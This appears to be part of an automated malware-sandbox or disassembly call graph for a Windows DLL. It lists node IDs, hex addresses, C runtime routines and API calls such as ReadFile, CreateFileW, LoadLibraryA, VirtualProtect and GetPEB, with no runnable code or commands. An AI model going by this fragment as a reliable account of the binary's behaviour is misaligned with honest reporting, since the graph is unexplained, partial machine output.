6fa5a001 18895->18898 18899 6fa5a00c GetProcAddress 18895->18899 18896->18895 18897 6fa59fda TlsGetValue 18896->18897 18903 6fa59fe5 18897->18903 18900 6fa55bcf __crt_waiting_on_module_handle 2 API calls 18898->18900 18901 6fa59fe9 GetProcAddress 18899->18901 18902 6fa5a007 18900->18902 18901->18868 18902->18899 18902->18901 18903->18895 18903->18901 18905 6fa55c4c ExitProcess 18904->18905 18906 6fa55c3c GetProcAddress 18904->18906 18906->18905 18908 6fa5a93c EnterCriticalSection 18907->18908 18909 6fa5a929 18907->18909 18908->18786 18923 6fa5a851 18909->18923 18911 6fa5a92f 18911->18908 18949 6fa55bff 18911->18949 18916 6fa5b154 18914->18916 18915 6fa549dc 18920 6fa549f5 18915->18920 18916->18915 18919 6fa5b1ed 18916->18919 18976 6fa5ac8d 18916->18976 18919->18915 18983 6fa5ad3d 18919->18983 18987 6fa5a83a LeaveCriticalSection 18920->18987 18922 6fa549fc 18922->18784 18924 6fa5a85d __freefls@4 18923->18924 18925 6fa5a883 18924->18925 18926 6fa5c046 __FF_MSGBANNER 62 API calls 18924->18926 18934 6fa5a893 __freefls@4 18925->18934 18956 6fa5a5c3 18925->18956 18928 6fa5a872 18926->18928 18930 6fa5be9b __NMSG_WRITE 62 API calls 18928->18930 18931 6fa5a879 18930->18931 18935 6fa55c53 _malloc 3 API calls 18931->18935 18932 6fa5a8a5 18936 6fa55348 __strnicoll_l 62 API calls 18932->18936 18933 6fa5a8b4 18937 6fa5a914 __lock 62 API calls 18933->18937 18934->18911 18935->18925 18936->18934 18938 6fa5a8bb 18937->18938 18939 6fa5a8c3 18938->18939 18940 6fa5a8ef 18938->18940 18961 6fa5e1d3 18939->18961 18941 6fa54618 __freebuf 62 API calls 18940->18941 18944 6fa5a8e0 18941->18944 18943 6fa5a8ce 18943->18944 18965 6fa54618 18943->18965 18971 6fa5a90b 18944->18971 18947 6fa5a8da 18948 6fa55348 __strnicoll_l 62 API calls 18947->18948 18948->18944 18950 6fa5c046 __FF_MSGBANNER 62 API calls 18949->18950 18951 6fa55c09 18950->18951 18952 6fa5be9b __NMSG_WRITE 62 API calls 18951->18952 18953 6fa55c11 18952->18953 18954 6fa5a033 __decode_pointer 6 API calls 18953->18954 18955 6fa55c1c 18954->18955 18955->18908 18957 6fa5a5cc 18956->18957 18958 6fa549fe _malloc 61 API calls 18957->18958 18959 6fa5a602 18957->18959 18960 6fa5a5e3 Sleep 18957->18960 18958->18957 18959->18932 18959->18933 18960->18957 18974 6fa553bc 18961->18974 18963 6fa5e1df InitializeCriticalSectionAndSpinCount 18964 6fa5e223 __freefls@4 18963->18964 18964->18943 18966 6fa54624 __freefls@4 18965->18966 18967 6fa546a0 __freefls@4 18966->18967 18968 6fa54677 HeapFree 18966->18968 18967->18947 18968->18967 18969 6fa5468a 18968->18969 18970 6fa55348 __strnicoll_l 61 API calls 18969->18970 18970->18967 18975 6fa5a83a LeaveCriticalSection 18971->18975 18973 6fa5a912 18973->18934 18974->18963 18975->18973 18977 6fa5acd4 HeapAlloc 18976->18977 18978 6fa5aca0 HeapReAlloc 18976->18978 18979 6fa5acf7 VirtualAlloc 18977->18979 18982 6fa5acbe 18977->18982 18980 6fa5acc2 18978->18980 18978->18982 18981 6fa5ad11 HeapFree 18979->18981 18979->18982 18980->18977 18981->18982 18982->18919 18984 6fa5ad54 VirtualAlloc 18983->18984 18986 6fa5ad9b 18984->18986 18986->18915 18987->18922 19002 6fa5a0ae TlsGetValue 18988->19002 18991 6fa5a273 SetLastError 18991->18795 18994 6fa5a033 __decode_pointer 6 API calls 18995 6fa5a24b 18994->18995 18996 6fa5a252 18995->18996 18997 6fa5a26a 18995->18997 19013 6fa5a11f 18996->19013 18999 6fa54618 __freebuf 59 API calls 18997->18999 19001 6fa5a270 18999->19001 19000 6fa5a25a GetCurrentThreadId 19000->18991 19001->18991 19003 6fa5a0c3 19002->19003 19004 6fa5a0de 19002->19004 19005 6fa5a033 __decode_pointer 6 API calls 19003->19005 19004->18991 19007 6fa5a608 19004->19007 19006 6fa5a0ce TlsSetValue 19005->19006 19006->19004 19009 6fa5a611 19007->19009 19010 6fa5a231 19009->19010 19011 6fa5a62f Sleep 19009->19011 19031 6fa5b40b 19009->19031 19010->18991 19010->18994 19012 6fa5a644 19011->19012 19012->19009 19012->19010 19048 6fa553bc 19013->19048 19015 6fa5a12b GetModuleHandleW 19016 6fa5a141 19015->19016 19017 6fa5a13b 19015->19017 19019 6fa5a17d 19016->19019 19020 6fa5a159 GetProcAddress GetProcAddress 19016->19020 19018 6fa55bcf __crt_waiting_on_module_handle 2 API calls 19017->19018 19018->19016 19021 6fa5a914 __lock 58 API calls 19019->19021 19020->19019 19022 6fa5a19c InterlockedIncrement 19021->19022 19049 6fa5a1f4 19022->19049 19025 6fa5a914 __lock 58 API calls 19026 6fa5a1bd 19025->19026 19052 6fa60414 InterlockedIncrement 19026->19052 19028 6fa5a1db 19064 6fa5a1fd 19028->19064 19030 6fa5a1e8 __freefls@4 19030->19000 19032 6fa5b417 __freefls@4 19031->19032 19033 6fa5b42f 19032->19033 19043 6fa5b44e _memset 19032->19043 19034 6fa55348 __strnicoll_l 61 API calls 19033->19034 19035 6fa5b434 19034->19035 19036 6fa5815c __strnicoll_l 6 API calls 19035->19036 19038 6fa5b444 __freefls@4 19036->19038 19037 6fa5b4c0 RtlAllocateHeap 19037->19043 19038->19009 19039 6fa5c08e _malloc 6 API calls 19039->19043 19040 6fa5a914 __lock 61 API calls 19040->19043 19041 6fa5b126 ___sbh_alloc_block 5 API calls 19041->19043 19043->19037 19043->19038 19043->19039 19043->19040 19043->19041 19044 6fa5b507 19043->19044 19047 6fa5a83a LeaveCriticalSection 19044->19047 19046 6fa5b50e 19046->19043 19047->19046 19048->19015 19067 6fa5a83a LeaveCriticalSection 19049->19067 19051 6fa5a1b6 19051->19025 19053 6fa60435 19052->19053 19054 6fa60432 InterlockedIncrement 19052->19054 19055 6fa60442 19053->19055 19056 6fa6043f InterlockedIncrement 19053->19056 19054->19053 19057 6fa6044f 19055->19057 19058 6fa6044c InterlockedIncrement 19055->19058 19056->19055 19059 6fa60459 InterlockedIncrement 19057->19059 19061 6fa6045c 19057->19061 19058->19057 19059->19061 19060 6fa60475 InterlockedIncrement 19060->19061 19061->19060 19062 6fa60485 InterlockedIncrement 19061->19062 19063 6fa60490 InterlockedIncrement 19061->19063 19062->19061 19063->19028 19068 6fa5a83a LeaveCriticalSection 19064->19068 19066 6fa5a204 19066->19030 19067->19051 19068->19066 19070 6fa414b6 19069->19070 19072 6fa414ac ctype 19069->19072 19071 6fa414ed 19070->19071 19079 6fa413f0 19070->19079 19074 6fa414fd 19071->19074 19075 6fa4150a 19071->19075 19072->18575 19084 6fa53fc0 19074->19084 19096 6fa53f43 19075->19096 19078 6fa41508 19078->18575 19080 6fa41330 ctype 19079->19080 19081 6fa413b0 ctype 19080->19081 19082 6fa53f43 _memcpy_s 62 API calls 19080->19082 19081->19071 19083 6fa4137d 19082->19083 19083->19071 19085 6fa53fd0 19084->19085 19095 6fa53fe9 19084->19095 19086 6fa53fd5 19085->19086 19088 6fa53ff5 19085->19088 19087 6fa55348 __strnicoll_l 62 API calls 19086->19087 19093 6fa53fda 19087->19093 19089 6fa54008 19088->19089 19090 6fa53ffa 19088->19090 19105 6fa58190 19089->19105 19091 6fa55348 __strnicoll_l 62 API calls 19090->19091 19091->19093 19094 6fa5815c __strnicoll_l 6 API calls 19093->19094 19094->19095 19095->19078 19100 6fa53f53 ___crtGetEnvironmentStringsA 19096->19100 19101 6fa53f57 _memset 19096->19101 19097 6fa53f5c 19098 6fa55348 __strnicoll_l 62 API calls 19097->19098 19099 6fa53f61 19098->19099 19103 6fa5815c __strnicoll_l 6 API calls 19099->19103 19100->19078 19101->19097 19101->19100 19102 6fa53fa6 19101->19102 19102->19100 19104 6fa55348 __strnicoll_l 62 API calls 19102->19104 19103->19100 19104->19099 19106 6fa581a8 19105->19106 19107 6fa581cf __VEC_memcpy 19106->19107 19108 6fa58248 19106->19108 19107->19106 19108->19095 19110 6fa53d7f 19109->19110 19111 6fa46dc1 ctype 2 API calls 19110->19111 19112 6fa53d92 19110->19112 19114 6fa53dad 19110->19114 19116 6fa53d9a _memset 19110->19116 19117 6fa53e3c 19110->19117 19111->19110 19171 6fa46911 19112->19171 19115 6fa468e2 ctype 62 API calls 19114->19115 19115->19116 19116->18597 19118 6fa468e2 ctype 62 API calls 19117->19118 19119 6fa53e45 19118->19119 19177 6fa45ac0 19119->19177 19121 6fa53e5e _memset 19122 6fa46911 ctype 63 API calls 19121->19122 19122->19116 19124 6fa45cd6 19123->19124 19180 6fa4afc3 19124->19180 19126 6fa45d57 19127 6fa4afc3 65 API calls 19126->19127 19128 6fa45d61 19127->19128 19194 6fa464e0 19128->19194 19131 6fa45eba GlobalAlloc 19134 6fa45f12 19131->19134 19132 6fa467c3 19132->18597 19133 6fa45d97 19133->19131 19133->19132 19136 6fa4b201 19135->19136 19137 6fa4b1fc 19135->19137 19139 6fa4b211 19136->19139 19140 6fa53d6c 65 API calls 19136->19140 19138 6fa46dc1 ctype 2 API calls 19137->19138 19138->19136 19139->18597 19140->19139 19141->19141 19144 6fa45e40 19141->19144 19142 6fa467c3 19142->18599 19143 6fa45eba GlobalAlloc 19145 6fa45f12 19143->19145 19144->19141 19144->19142 19144->19143 19144->19144 19149 6fa46250 19146->19149 19147 6fa462f3 ReadFile 19148 6fa461f0 19147->19148 19147->19149 19148->18599 19149->19147 19149->19149 19150 6fa466d2 19149->19150 19152 6fa45de6 19151->19152 19153 6fa45eba GlobalAlloc 19152->19153 19154 6fa461d2 19152->19154 19155 6fa45f12 19153->19155 19154->18599 19162 6fa463fe 19156->19162 19157 6fa465f3 LoadLibraryA VirtualProtect 19159 6fa467f8 19157->19159 19158 6fa466f0 19160 6fa46649 VirtualProtect 19159->19160 19161 6fa46663 19160->19161 19161->18599 19162->19157 19162->19158 19164 6fa552a4 19163->19164 19165 6fa552b0 RaiseException 19163->19165 19164->19165 19165->18589 19167 6fa5527b __CxxThrowException@8 RaiseException 19166->19167 19168 6fa46ddc __EH_prolog3 19167->19168 19202 6fa4ba28 LocalAlloc 19168->19202 19170 6fa46df3 ctype 19170->18586 19173 6fa54618 __freefls@4 19171->19173 19172 6fa546a0 __freefls@4 19172->19116 19173->19172 19174 6fa54677 HeapFree 19173->19174 19174->19172 19175 6fa5468a 19174->19175 19176 6fa55348 __strnicoll_l 62 API calls 19175->19176 19176->19172 19178 6fa53f43 _memcpy_s 62 API calls 19177->19178 19179 6fa45ad9 19178->19179 19179->19121 19182 6fa4afd6 19180->19182 19181 6fa46dc1 ctype 2 API calls 19181->19182 19182->19181 19183 6fa4afe9 19182->19183 19185 6fa4b009 19182->19185 19187 6fa4aff1 _memset 19182->19187 19188 6fa4b08c 19182->19188 19184 6fa46911 ctype 63 API calls 19183->19184 19184->19187 19186 6fa468e2 ctype 62 API calls 19185->19186 19186->19187 19187->19126 19189 6fa468e2 ctype 62 API calls 19188->19189 19190 6fa4b094 19189->19190 19191 6fa45ac0 62 API calls 19190->19191 19192 6fa4b0a5 _memset 19191->19192 19193 6fa46911 ctype 63 API calls 19192->19193 19193->19187 19199 6fa464ea 19194->19199 19195 6fa465f3 LoadLibraryA VirtualProtect 19200 6fa467f8 19195->19200 19198 6fa45d67 GetPEB 19198->19133 19199->19195 19199->19199 19201 6fa46649 VirtualProtect 19200->19201 19201->19198 19203 6fa4ba41 19202->19203 19204 6fa4ba3c 19202->19204 19203->19170 19206 6fa46d89 19204->19206 19207 6fa5527b __CxxThrowException@8 RaiseException 19206->19207 19208 6fa46da4 19207->19208 19210 6fa448be ctype 19209->19210 19211 6fa462d0 ReadFile 19210->19211 19212 6fa4492c 19211->19212 19213 6fa415f0 63 API calls 19212->19213 19214 6fa4493e 19213->19214 19272 6fa430e0 19214->19272 19216 6fa4496f 19218 6fa44a3d 19216->19218 19275 6fa43150 19216->19275 19220 6fa53f34 ___strgtold12_l 5 API calls 19218->19220 19222 6fa44aae 19220->19222 19221 6fa415f0 63 API calls 19223 6fa44996 19221->19223 19222->18611 19279 6fa45670 19223->19279 19225 6fa449d6 19226 6fa4afc3 65 API calls 19225->19226 19227 6fa449f9 ___crtGetEnvironmentStringsA 19226->19227 19227->19218 19228 6fa54618 __freebuf 62 API calls 19227->19228 19228->19218 19230 6fa44b00 19229->19230 19482 6fa43720 19230->19482 19235 6fa4afc3 65 API calls 19236 6fa44e44 19235->19236 19237 6fa44e88 19236->19237 19239 6fa44e63 19236->19239 19238 6fa44e97 19237->19238 19240 6fa46dc1 ctype 2 API calls 19237->19240 19498 6fa457c0 19238->19498 19492 6fa4b0d5 19239->19492 19240->19238 19244 6fa4b0d5 65 API calls 19245 6fa44e86 ctype 19244->19245 19246 6fa44f2a 19245->19246 19247 6fa462d0 ReadFile 19246->19247 19248 6fa44f5b 19247->19248 19249 6fa415f0 63 API calls 19248->19249 19250 6fa44f6f 19249->19250 19519 6fa4afb3 19250->19519 19254 6fa466d2 19253->19254 19257 6fa4626d 19253->19257 19255 6fa462f3 ReadFile 19256 6fa461f0 19255->19256 19255->19257 19256->18626 19257->19254 19257->19255 19259 6fa454f7 19258->19259 19263 6fa454be 19258->19263 19260 6fa431f0 98 API calls 19259->19260 19259->19263 19261 6fa4551a 19260->19261 19262 6fa42600 96 API calls 19261->19262 19262->19263 19263->18626 19265 6fa44616 19264->19265 19266 6fa53f34 ___strgtold12_l 5 API calls 19265->19266 19267 6fa446ee 19266->19267 19267->18612 19269 6fa447f9 19268->19269 19270 6fa53f34 ___strgtold12_l 5 API calls 19269->19270 19271 6fa44873 19270->19271 19271->18619 19291 6fa42b50 19272->19291 19274 6fa430f2 _wcspbrk 19274->19216 19276 6fa4318b ctype 19275->19276 19277 6fa42600 96 API calls 19276->19277 19278 6fa431d7 19277->19278 19278->19221 19280 6fa45681 lstrlenW 19279->19280 19281 6fa4567b 19279->19281 19397 6fa45730 19280->19397 19281->19225 19284 6fa456c5 GetLastError 19286 6fa45716 19284->19286 19287 6fa456d0 WideCharToMultiByte 19284->19287 19285 6fa4571f 19285->19225 19286->19285 19405 6fa45b00 GetLastError 19286->19405 19288 6fa45730 72 API calls 19287->19288 19289 6fa456f4 WideCharToMultiByte 19288->19289 19289->19286 19292 6fa42b7e ctype 19291->19292 19293 6fa42bd1 19292->19293 19294 6fa42bb9 19292->19294 19295 6fa414a0 ctype 63 API calls 19293->19295 19298 6fa4a58c 19294->19298 19297 6fa42bc2 19295->19297 19297->19274 19301 6fa4aef1 19298->19301 19300 6fa4a591 19300->19297 19306 6fa4c050 19301->19306 19303 6fa4af00 19304 6fa4af23 19303->19304 19317 6fa4bb0c 19303->19317 19304->19300 19308 6fa4c05c __EH_prolog3 19306->19308 19307 6fa46dc1 ctype 2 API calls 19307->19308 19308->19307 19309 6fa4c0aa 19308->19309 19323 6fa4bd66 TlsAlloc 19308->19323 19327 6fa4bc4e EnterCriticalSection 19308->19327 19341 6fa4ba5b EnterCriticalSection 19309->19341 19314 6fa4c0d0 ctype 19314->19303 19315 6fa4c0bd 19348 6fa4be0d 19315->19348 19318 6fa4bb18 __EH_prolog3_catch 19317->19318 19319 6fa4bb41 ctype 19318->19319 19380 6fa4c220 19318->19380 19319->19303 19321 6fa4bb27 19390 6fa4c292 19321->19390 19324 6fa4bd97 InitializeCriticalSection 19323->19324 19325 6fa4bd92 19323->19325 19324->19308 19326 6fa46d89 ctype RaiseException 19325->19326 19326->19324 19329 6fa4bc71 19327->19329 19328 6fa4bd30 _memset 19330 6fa4bd47 LeaveCriticalSection 19328->19330 19329->19328 19331 6fa4bcbf GlobalHandle GlobalUnlock 19329->19331 19332 6fa4bcaa ctype 19329->19332 19330->19308 19370 6fa469d7 19331->19370 19334 6fa4bcb2 GlobalAlloc 19332->19334 19336 6fa4bce9 19334->19336 19335 6fa4bcdd GlobalReAlloc 19335->19336 19337 6fa4bd10 GlobalLock 19336->19337 19338 6fa4bcf4 GlobalHandle GlobalLock 19336->19338 19339 6fa4bd02 LeaveCriticalSection 19336->19339 19337->19328 19338->19339 19340 6fa46d89 ctype RaiseException 19339->19340 19340->19337 19342 6fa4ba76 19341->19342 19343 6fa4ba9d LeaveCriticalSection 19341->19343 19342->19343 19344 6fa4ba7b TlsGetValue 19342->19344 19345 6fa4baa6 19343->19345 19344->19343 19346 6fa4ba87 19344->19346 19345->19314 19345->19315 19346->19343 19347 6fa4ba8c LeaveCriticalSection 19346->19347 19347->19345 19372 6fa550fc 19348->19372 19350 6fa4be19 EnterCriticalSection 19351 6fa4bf1c LeaveCriticalSection 19350->19351 19352 6fa4be38 19350->19352 19355 6fa4bf3f ctype 19351->19355 19352->19351 19354 6fa4be41 TlsGetValue 19352->19354 19356 6fa4be7f 19354->19356 19358 6fa4be4f 19354->19358 19355->19314 19357 6fa4ba28 ctype 2 API calls 19356->19357 19359 6fa4be89 19357->19359 19358->19351 19360 6fa4bec4 ctype 19358->19360 19361 6fa4be69 ctype 19358->19361 19373 6fa4bbbf 19359->19373 19363 6fa4bed0 LocalReAlloc 19360->19363 19364 6fa4be73 LocalAlloc 19361->19364 19365 6fa4bedc 19363->19365 19364->19365 19366 6fa4bee0 LeaveCriticalSection 19365->19366 19367 6fa4beee _memset 19365->19367 19368 6fa46d89 ctype RaiseException 19366->19368 19369 6fa4bf07 TlsSetValue 19367->19369 19368->19367 19369->19351 19371 6fa469ec ctype 19370->19371 19371->19335 19372->19350 19376 6fa4bba5 19373->19376 19377 6fa4bbb5 19376->19377 19378 6fa4bbb0 19376->19378 19377->19358 19379 6fa46dc1 ctype LocalAlloc RaiseException 19378->19379 19379->19377 19381 6fa4c235 19380->19381 19382 6fa4c230 19380->19382 19384 6fa4c243 19381->19384 19394 6fa4c1b7 19381->19394 19383 6fa46dc1 ctype 2 API calls 19382->19383 19383->19381 19386 6fa4c255 EnterCriticalSection 19384->19386 19387 6fa4c27f EnterCriticalSection 19384->19387 19388 6fa4c274 LeaveCriticalSection 19386->19388 19389 6fa4c261 InitializeCriticalSection 19386->19389 19387->19321 19388->19387 19389->19388 19391 6fa4c2a4 LeaveCriticalSection 19390->19391 19392 6fa4c29f 19390->19392 19391->19319 19393 6fa46dc1 ctype 2 API calls 19392->19393 19393->19391 19395 6fa4c1d5 19394->19395 19396 6fa4c1c0 InitializeCriticalSection 19394->19396 19395->19384 19396->19395 19398 6fa45734 19397->19398 19403 6fa45788 19398->19403 19404 6fa45771 19398->19404 19407 6fa546a6 19398->19407 19401 6fa54618 __freebuf 62 API calls 19401->19403 19402 6fa4569f WideCharToMultiByte 19402->19284 19402->19285 19403->19402 19418 6fa54721 19403->19418 19404->19401 19404->19403 19406 6fa45b0a 19405->19406 19408 6fa546b5 19407->19408 19409 6fa546dd 19407->19409 19408->19409 19411 6fa546c1 19408->19411 19410 6fa546f2 19409->19410 19425 6fa57637 19409->19425 19438 6fa54ac8 19410->19438 19414 6fa55348 __strnicoll_l 62 API calls 19411->19414 19415 6fa546c6 19414->19415 19416 6fa5815c __strnicoll_l 6 API calls 19415->19416 19417 6fa546d6 _memset 19416->19417 19417->19404 19419 6fa5b40b __calloc_impl 62 API calls 19418->19419 19420 6fa5473b 19419->19420 19421 6fa55348 __strnicoll_l 62 API calls 19420->19421 19424 6fa54757 19420->19424 19422 6fa5474e 19421->19422 19423 6fa55348 __strnicoll_l 62 API calls 19422->19423 19422->19424 19423->19424 19424->19403 19426 6fa57643 __freefls@4 19425->19426 19427 6fa57670 19426->19427 19428 6fa57653 19426->19428 19429 6fa576b1 HeapSize 19427->19429 19431 6fa5a914 __lock 62 API calls 19427->19431 19430 6fa55348 __strnicoll_l 62 API calls 19428->19430 19435 6fa57668 __freefls@4 19429->19435 19432 6fa57658 19430->19432 19433 6fa57680 ___sbh_find_block 19431->19433 19434 6fa5815c __strnicoll_l 6 API calls 19432->19434 19474 6fa576d1 19433->19474 19434->19435 19435->19410 19439 6fa54ad4 __freefls@4 19438->19439 19440 6fa54ae9 19439->19440 19441 6fa54adb 19439->19441 19443 6fa54af0 19440->19443 19444 6fa54afc 19440->19444 19442 6fa549fe _malloc 62 API calls 19441->19442 19460 6fa54ae3 __dosmaperr __freefls@4 19442->19460 19445 6fa54618 __freebuf 62 API calls 19443->19445 19450 6fa54c6e 19444->19450 19473 6fa54b09 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 19444->19473 19445->19460 19446 6fa54ca1 19448 6fa5c08e _malloc 6 API calls 19446->19448 19447 6fa54c73 HeapReAlloc 19447->19450 19447->19460 19451 6fa54ca7 19448->19451 19449 6fa5a914 __lock 62 API calls 19449->19473 19450->19446 19450->19447 19452 6fa54cc5 19450->19452 19454 6fa5c08e _malloc 6 API calls 19450->19454 19457 6fa54cbb 19450->19457 19453 6fa55348 __strnicoll_l 62 API calls 19451->19453 19455 6fa55348 __strnicoll_l 62 API calls 19452->19455 19452->19460 19453->19460 19454->19450 19456 6fa54cce GetLastError 19455->19456 19456->19460 19459 6fa55348 __strnicoll_l 62 API calls 19457->19459 19462 6fa54c3c 19459->19462 19460->19417 19461 6fa54b94 HeapAlloc 19461->19473 19462->19460 19464 6fa54c41 GetLastError 19462->19464 19463 6fa54be9 HeapReAlloc 19463->19473 19464->19460 19465 6fa5b126 ___sbh_alloc_block 5 API calls 19465->19473 19466 6fa54c54 19466->19460 19468 6fa55348 __strnicoll_l 62 API calls 19466->19468 19467 6fa5c08e _malloc 6 API calls 19467->19473 19470 6fa54c61 19468->19470 19469 6fa5a977 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 19469->19473 19470->19456 19470->19460 19471 6fa54c37 19472 6fa55348 __strnicoll_l 62 API calls 19471->19472 19472->19462 19473->19446 19473->19449 19473->19460 19473->19461 19473->19463 19473->19465 19473->19466 19473->19467 19473->19469 19473->19471 19478 6fa54c0c 19473->19478 19477 6fa5a83a LeaveCriticalSection 19474->19477 19476 6fa576ac 19476->19429 19476->19435 19477->19476 19481 6fa5a83a LeaveCriticalSection 19478->19481 19480 6fa54c13 19480->19473 19481->19480 19483 6fa43756 19482->19483 19484 6fa4afc3 65 API calls 19483->19484 19485 6fa43769 19484->19485 19486 6fa460f0 CreateFileW 19485->19486 19487 6fa461de 19486->19487 19490 6fa45de6 19486->19490 19488 6fa45eba GlobalAlloc 19491 6fa45f12 19488->19491 19489 6fa44d7d 19489->19235 19490->19488 19490->19489 19493 6fa4b0e5 19492->19493 19494 6fa4b0ff 19492->19494 19495 6fa4afc3 65 API calls 19493->19495 19494->19245 19496 6fa4b0ef 19495->19496 19497 6fa45ac0 62 API calls 19496->19497 19497->19494 19499 6fa457f3 19498->19499 19500 6fa457f8 19498->19500 19501 6fa46dc1 ctype 2 API calls 19499->19501 19502 6fa45841 19500->19502 19504 6fa457fa 19500->19504 19501->19500 19503 6fa458bb 19502->19503 19509 6fa45848 _memset 19502->19509 19506 6fa45992 19503->19506 19511 6fa458c6 _memset 19503->19511 19505 6fa46911 ctype 63 API calls 19504->19505 19508 6fa44ea0 19504->19508 19505->19508 19507 6fa459d8 19506->19507 19510 6fa46dc1 ctype 2 API calls 19506->19510 19514 6fa45ac0 62 API calls 19507->19514 19508->19244 19509->19508 19513 6fa43720 65 API calls 19509->19513 19510->19507 19511->19508 19512 6fa43720 65 API calls 19511->19512 19512->19511 19513->19509 19516 6fa45a0d _memset 19514->19516 19515 6fa45a8e 19517 6fa46911 ctype 63 API calls 19515->19517 19516->19515 19518 6fa43720 65 API calls 19516->19518 19517->19508 19518->19516 19520 6fa46911 ctype 63 API calls 19519->19520 19521 6fa4504b 19520->19521 19521->18626 19524 6fa47696 ctype 19522->19524 19523 6fa47807 19536 6fa477fb 19523->19536 19586 6fa42330 19523->19586 19524->19523 19526 6fa476bd 19524->19526 19543 6fa4748e 19526->19543 19527 6fa53f34 ___strgtold12_l 5 API calls 19529 6fa47835 19527->19529 19529->18629 19536->19527 19620 6fa41440 19537->19620 19539 6fa47312 _memset 19540 6fa46a35 62 API calls 19539->19540 19541 6fa47329 PathStripToRootW 19540->19541 19542 6fa4733d 19541->19542 19542->18631 19544 6fa4749d __EH_prolog3_GS 19543->19544 19545 6fa46dc1 ctype 2 API calls 19544->19545 19546 6fa474c7 GetFullPathNameW 19544->19546 19545->19544 19547 6fa47505 19546->19547 19548 6fa474e0 19546->19548 19550 6fa47524 19547->19550 19551 6fa47509 19547->19551 19593 6fa46a35 19548->19593 19555 6fa472fd 63 API calls 19550->19555 19554 6fa42330 63 API calls 19551->19554 19565 6fa474fe ctype 19551->19565 19552 6fa474ef 19553 6fa4745f 64 API calls 19552->19553 19553->19565 19554->19565 19557 6fa47540 PathIsUNCW 19555->19557 19559 6fa47554 GetVolumeInformationW 19557->19559 19557->19565 19560 6fa47596 19559->19560 19561 6fa47577 19559->19561 19563 6fa475a6 19560->19563 19564 6fa4759f CharUpperW 19560->19564 19562 6fa4745f 64 API calls 19561->19562 19562->19565 19563->19565 19566 6fa475af FindFirstFileW 19563->19566 19564->19563 19599 6fa551b5 19565->19599 19566->19565 19567 6fa475c7 FindClose 19566->19567 19567->19561 19568 6fa475d7 19567->19568 19568->19561 19569 6fa475df lstrlenW 19568->19569 19570 6fa475fc 19569->19570 19571 6fa4762d 19569->19571 19596 6fa46ea0 19570->19596 19571->19565 19573 6fa42330 63 API calls 19571->19573 19573->19565 19587 6fa4234a 19586->19587 19588 6fa4233b 19586->19588 19591 6fa414a0 ctype 63 API calls 19587->19591 19589 6fa414a0 ctype 63 API calls 19588->19589 19590 6fa42344 19589->19590 19590->19536 19592 6fa42369 19591->19592 19592->19536 19602 6fa544cb 19593->19602 19595 6fa46a4b 19595->19552 19611 6fa551ed 19596->19611 19598 6fa46eb3 19598->19565 19600 6fa53f34 ___strgtold12_l 5 API calls 19599->19600 19601 6fa551bf 19600->19601 19601->19601 19607 6fa544dd 19602->19607 19603 6fa544e1 19604 6fa544e6 19603->19604 19605 6fa55348 __strnicoll_l 62 API calls 19603->19605 19604->19595 19606 6fa544fd 19605->19606 19608 6fa5815c __strnicoll_l 6 API calls 19606->19608 19607->19603 19607->19604 19609 6fa5452d 19607->19609 19608->19604 19609->19604 19610 6fa55348 __strnicoll_l 62 API calls 19609->19610 19610->19606 19612 6fa55205 19611->19612 19613 6fa551fe 19611->19613 19614 6fa55348 __strnicoll_l 62 API calls 19612->19614 19613->19612 19618 6fa55231 19613->19618 19615 6fa5520a 19614->19615 19616 6fa5815c __strnicoll_l 6 API calls 19615->19616 19617 6fa55219 19616->19617 19617->19598 19618->19617 19619 6fa55348 __strnicoll_l 62 API calls 19618->19619 19619->19615 19621 6fa41465 19620->19621 19622 6fa4145d 19620->19622 19621->19539 19623 6fa413f0 ctype 62 API calls 19622->19623 19623->19621 19625 6fa47bd6 ctype 19624->19625 19626 6fa47bea 19624->19626 19628 6fa47b85 19625->19628 19626->18637 19629 6fa47b91 __EH_prolog3 19628->19629 19630 6fa468e2 ctype 62 API calls 19629->19630 19631 6fa47b98 19630->19631 19632 6fa47bb5 19631->19632 19633 6fa42370 ctype 63 API calls 19631->19633 19634 6fa5527b __CxxThrowException@8 RaiseException 19632->19634 19633->19632 19636 6fa47bca ctype 19634->19636 19635 6fa47bea 19635->19626 19636->19635 19637 6fa47b85 ctype 64 API calls 19636->19637 19637->19635 19639 6fa41580 62 API calls 19638->19639 19640 6fa42f92 19639->19640 19641 6fa413f0 ctype 62 API calls 19640->19641 19642 6fa42fc2 __wcsrev 19640->19642 19641->19642 19643 6fa42f60 62 API calls 19642->19643 19644 6fa42fe0 _wcspbrk 19642->19644 19645 6fa4309f 19643->19645 19644->18642 19646 6fa430a7 19645->19646 19647 6fa430bc 19645->19647 19648 6fa43370 62 API calls 19646->19648 19649 6fa41580 62 API calls 19647->19649 19650 6fa430b8 19648->19650 19651 6fa430c7 19649->19651 19650->18642 19651->18642 19653 6fa43386 19652->19653 19654 6fa43391 19653->19654 19657 6fa433af ctype 19653->19657 19655 6fa41580 62 API calls 19654->19655 19656 6fa4339a 19655->19656 19656->18647 19665 6fa43680 19657->19665 19662 6fa4158f ctype 19660->19662 19661 6fa4159c 19661->18648 19662->19661 19663 6fa53f43 _memcpy_s 62 API calls 19662->19663 19664 6fa415e1 19663->19664 19664->18648 19666 6fa4368b ctype 19665->19666 19667 6fa53f43 _memcpy_s 62 API calls 19666->19667 19668 6fa433e6 19667->19668 19668->18647 19670 6fa4340e 19669->19670 19671 6fa4341f 19669->19671 19678 6fa428d0 LoadResource 19670->19678 19671->18654 19673 6fa43416 19673->19671 19674 6fa43447 19673->19674 19675 6fa413f0 ctype 62 API calls 19673->19675 19676 6fa53f43 _memcpy_s 62 API calls 19674->19676 19675->19674 19677 6fa4347e 19676->19677 19677->18654 19679 6fa428e6 19678->19679 19680 6fa428e9 LockResource 19678->19680 19679->19673 19681 6fa4290a 19680->19681 19682 6fa428f7 SizeofResource 19680->19682 19681->19673 19682->19681 19684 6fa4124c 19683->19684 19691 6fa54320 19684->19691 19687 6fa41286 19694 6fa541a0 19687->19694 19688 6fa413f0 ctype 62 API calls 19688->19687 19690 6fa41294 19690->18671 19697 6fa542c9 19691->19697 19703 6fa54115 19694->19703 19698 6fa542d9 19697->19698 19701 6fa41263 19697->19701 19699 6fa55348 __strnicoll_l 62 API calls 19698->19699 19700 6fa542de 19699->19700 19702 6fa5815c __strnicoll_l 6 API calls 19700->19702 19701->19687 19701->19688 19702->19701 19704 6fa54122 19703->19704 19705 6fa5413f 19703->19705 19706 6fa55348 __strnicoll_l 62 API calls 19704->19706 19707 6fa5414c 19705->19707 19709 6fa54159 19705->19709 19708 6fa54127 19706->19708 